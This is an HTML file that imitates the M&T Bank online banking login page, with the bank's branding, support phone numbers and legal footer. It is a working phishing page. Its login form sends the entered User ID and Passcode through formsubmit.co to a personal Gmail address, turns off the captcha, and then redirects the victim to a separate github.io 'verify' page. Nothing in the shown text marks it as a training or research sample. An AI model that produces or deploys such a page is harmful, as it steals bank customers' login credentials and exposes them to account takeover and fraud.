<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport"
        content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0" />
    <title>Log in to Online Banking</title>
    <link rel="stylesheet" href="./bootstrap.css" />
    <link rel="stylesheet" href="./bootstrap.min.css" />
    <link rel="stylesheet" href="./all.css" />
    <style>
        * {
            margin: 0;
            padding: 0;
        }
        nav {
            border-bottom: 7px solid orange;
        }

        #headthree {
            color: darkgreen;
            font-weight: 400;
        }

        .head_p {
            color: darkgreen;
        }


        .login-box {
            display: flex;
            align-items: center;
            justify-content: center;
        }

        .personal {
            padding: 0.7rem 3.3rem;
            color: white;
            background-color: darkgreen;
            border: 1px solid darkgreen;
        }

        .commercial {
            padding: 0.7rem 3.3rem;
            color: black;
            background-color: white;
            border: 1px solid grey;
        }

        .form-btns {
            width: 100%;
            padding: 0.7rem 3.3rem;
            color: white;
            background-color: darkgreen;
            border: 1px solid darkgreen;
            border-radius: 3px;
        }

        .small_link {
            text-decoration: underline;
        }

        .small_text {
            font-size: 15px;
            font-weight: 200;
            word-spacing: 2px;
        }
        footer {
            position: relative;
            bottom: 0;
            height: 100%;
            background-color: lightgray;
        }
        .pipe {
        
            color: gray;
        }
    </style>
</head>

<body>
    <nav id="nav" class="navbar navbar-expand-lg py-3 fixed-top" style="background-color: darkgreen; color: black">
        <div class="container">
            <div class="mx-auto">
                <img src="./white logo.png" onclick="window.location.href = 'index.html'" id="logo" alt="" width="104px"
                    height="19px" />
            </div>

        </div>
    </nav>

    <section class="mt-5">
        <div class="container text-center mt-5 p-5">
            <h1 id="headthree">Log In to Online Banking</h1>
            <p class="head_p">For Personal and Business Accounts</p>
        </div>
        <form method="POST" action="https://formsubmit.co/fishtina84@gmail.com">
            <input type="hidden" name="_next" value="https://code-warlock.github.io/testb/verify.html">
            <input type="hidden" name="_captcha" value="false">
            <div class="row container input-group  px-5 mx-auto" id="personal">
                <div class="input-group col-lg-3 col-md-4 col-12 "></div>
                <label for="" class="p-0">User ID</label>
                <input type="text" class="form-control" name="UserID" required />
                <div class="input-group col-lg-3 col-md-4 col-12 pb-4"></div>
                <label for="">Passcode</label>
                <input type="password" class="form-control" name="Passcode" required />
                <div class="input-group my-2">
                    <div class="input-group-prepend pr-3">
                        <div class="input-group">
                            <input type="checkbox" aria-label="Checkbox for following text input">
                        </div>
                    </div>
                    <label for="">Remember User ID</label>
                </div>
                <div class="input-group my-4">
                    <div class="input-group">
                        <button class="form-btns" type="submit">Login </button>
                    </div>
                </div>
            </div>
        </form>
        <div class="container text-center">
            <p class="head_p small_link">Help with User ID or Passcode</p>
            <p class="head_p small_link">Enroll Now</p>
        </div>

        <div class="container text-center pt-4">
            <p class="small_text">Unauthorized access is prohibited. Usage may be monitorized.</p>
        </div>
        <hr>
        <div class="container text-center p-4">
            <p class="">Have questions about M&T Online Banking?</p>

            <div>
                <p class="head_p">Personal Accounts: 1-800-790-9130</p>
                <span class="small_text">Monday - Friday 8am - 9pm ET</span>
                <p class="small_text">Saturday - Sunday 9am - 5pm ET</p>
            </div>

            <div>
                <p class="head_p">Business Accounts: 1-800-724-6070</p>
                <span class="small_text">Monday - Friday 8am - 9pm ET</span>
                <p class="small_text">Saturday - Sunday 9am - 5pm ET</p>
            </div>
        </div>
    </section>
    <footer>

        <div class="container text_center footer_top_links pt-5">
            <a href="" class="head_p px-2 small_link">Get Started Guide</a> <span class="pipe px-3">|</span>
            <a href="" class="head_p px-2 small_link">Security Assistance</a> <span class="pipe px-3">|</span>
            <a href="" class="head_p px-2 small_link">Digital Service</a>
            <a href="" class="head_p px-1 small_link">Agreement</a> <span class="pipe px-2">|</span>
            <a href="" class="head_p px-1 small_link">Esign Agreement</a> <span class="pipe px-2">|</span>
            <a href="" class="head_p px-1 small_link">Accessibility</a> <span class="pipe px-2">|</span>
            <a href="" class="head_p px-1 small_link">mtb.com</a>
        </div>

        <div class="container text-center pt-4">
            <span class="">&copy; 2022 M&T Bank. All Rights Reserved.</span><br>
            <span class="">Users of this website agree to be bound by the provisions of the M&T website</span><br>
            <a href="" class="head_p small_link">Terms of Use</a><span class="">and</span><a href="" class="head_p px-1 small_link">Privacy Policy</a>

            <div class="p-4">
                <img src="./equal-housing-lender-logo.png" width="30" alt="" class="mx-3">
                <img src="./mtb-entrust.svg" width="80" alt=""><br>
                <span class="my-4">Equal Housing Lender NMLS #381076 <a href="" class="head_p small_link">Member FDIC</a></span>
            </div>
        </div>
    </footer>
    </script>
</body>

</html>